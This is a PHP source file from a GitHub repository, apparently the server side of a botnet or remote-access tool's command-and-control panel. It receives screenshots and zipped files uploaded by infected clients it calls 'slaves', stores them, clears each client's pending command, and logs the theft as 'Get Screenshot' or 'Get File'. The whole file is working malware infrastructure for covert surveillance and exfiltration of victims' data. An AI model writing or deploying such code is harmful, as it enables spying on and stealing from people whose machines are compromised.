-
Notifications
You must be signed in to change notification settings - Fork 1
/
getjuice.php
105 lines (97 loc) · 3.59 KB
/
getjuice.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<?php
include 'conn.php';
$uploads_dir = './files';
$name = uniqid();
if (isset($_FILES["file"]["name"]) && $_FILES["file"]["error"] == UPLOAD_ERR_OK)
{
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
if(pathinfo($name,PATHINFO_EXTENSION) == "png" && $_FILES["file"]["size"] < 52428800)
{
if(strpos($name, '_'))
{
$parsedName = explode("_", $name);
if(!preg_match("[\W]", $parsedName[0]))
{
if (function_exists('openssl_random_pseudo_bytes')){
$nameWithEntropy = uniqid(bin2hex(openssl_random_pseudo_bytes(16)));
}
else{
$nameWithEntropy = uniqid();
}
$saveName = $parsedName[0] . "_" . $nameWithEntropy.".png";
$dbImagePathVariable = $uploads_dir . "/" . $saveName;
if(move_uploaded_file($tmp_name, "$uploads_dir/$saveName"))
{
$virtualResponse = "Screenshot saved to " . $dbImagePathVariable;
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?, slaveLatestImagePath=?, slaveCommand='' where slaveId=?");
$addFilePath->bind_param("sss",$virtualResponse,$dbImagePathVariable,$parsedName[0]);
$addFilePath->execute();
$insertLog = $conn->prepare("INSERT INTO logs(logDate, logType, logClient, logContent) values(NOW(),'Get Screenshot',?,?)");
$insertLog->bind_param("ss",$parsedName[0],$virtualResponse );
$insertLog->execute();
$insertLog->close();
}
else
{
$virtualResponse = "Operation failed.";
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?, slaveLatestImagePath=?, slaveCommand='' where slaveId=?");
$addFilePath->bind_param("sss",$virtualResponse,$dbImagePathVariable,$parsedName[0]);
$addFilePath->execute();
}
}
else{
die();
}
}
else{
die();
}
}
elseif(pathinfo($name,PATHINFO_EXTENSION) == "zip" && $_FILES["file"]["size"] < 52428800){ //50 MB max.
if(strpos($name, '_'))
{
$parsedName = explode("_", $name);
if(!preg_match("[\W]", $parsedName[0]))
{
if (function_exists('openssl_random_pseudo_bytes')){
$nameWithEntropy = uniqid(bin2hex(openssl_random_pseudo_bytes(16)));
}
else{
$nameWithEntropy = uniqid();
}
$saveName = $parsedName[0] . "_" . $nameWithEntropy.".zip";
$dbzipFilePathVariable = $uploads_dir . "/" . $saveName;
if(move_uploaded_file($tmp_name, "$uploads_dir/$saveName"))
{
$virtualResponse = "Zip file saved to " . $dbzipFilePathVariable;
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?,slaveCommand='' where slaveId=?");
$addFilePath->bind_param("ss",$virtualResponse,$parsedName[0]);
$addFilePath->execute();
$insertLog = $conn->prepare("INSERT INTO logs(logDate, logType, logClient, logContent) values(NOW(),'Get File',?,?)");
$insertLog->bind_param("ss",$parsedName[0],$virtualResponse );
$insertLog->execute();
$insertLog->close();
}
else
{
$virtualResponse = "Operation failed.";
$addFilePath = $conn->prepare("UPDATE slaves set slaveResponse=?, slaveCommand='' where slaveId=?");
$addFilePath->bind_param("ss",$virtualResponse,$parsedName[0]);
$addFilePath->execute();
}
}
else{
die();
}
}
else{
die();
}
}
else
{
echo "Fuck off boomer.";
}
}
?>